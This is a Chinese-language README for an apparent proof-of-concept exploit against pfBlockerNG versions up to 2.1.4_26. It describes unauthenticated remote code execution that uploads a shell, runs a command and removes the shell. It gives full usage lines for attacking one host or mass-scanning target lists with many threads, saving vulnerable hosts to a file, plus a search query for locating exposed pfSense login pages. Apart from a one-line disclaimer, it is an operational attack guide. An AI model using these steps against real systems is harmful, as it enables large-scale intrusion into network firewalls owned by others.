该脚本是针对 pfBlockerNG <= 2.1.4_26 的概念验证漏洞利用程序,可实现远程代码执行。它接受单个目标 URL 或 URL 列表,上传 shell,执行命令,然后删除 shell。
此脚本需要 Python 3.x 以及 requests 和 concurrent.futures 模块。你可以通过运行以下命令安装这些模块:
pip3 install requests concurrent.futures
或
pip3 install -r requirements.txt
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]
pfBlockerNG <= 2.1.4_26 未授权RCE
options:
-h, --help 显示帮助信息并退出
-c COMMAND, --command COMMAND
控制台命令 ('id')
-l LIST, --list LIST 目标列表 (list.txt)
-i IP, --ip IP 基础目标 URI (例如 http://target-uri/)
-t THREADS, --threads THREADS
大规模扫描的线程数
-o OUTPUT, --output OUTPUT
输出文件 (vuln.txt)
要利用单个目标,请使用 -i 或 --ip 标志并指定基础 URL 或 IP 地址:
python3 exploit.py -i http://target-uri/ -c 'id'
要扫描多个目标,请使用 -l 或 --list 标志并指定列表路径:
python3 exploit.py -l list.txt -c 'id' -t 50
-t 或 --threads 标志可用于指定扫描使用的线程数。
如果指定了 -o 或 --output 标志,易受攻击的目标列表将写入文件:
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
此脚本仅供教育用途。使用风险自负。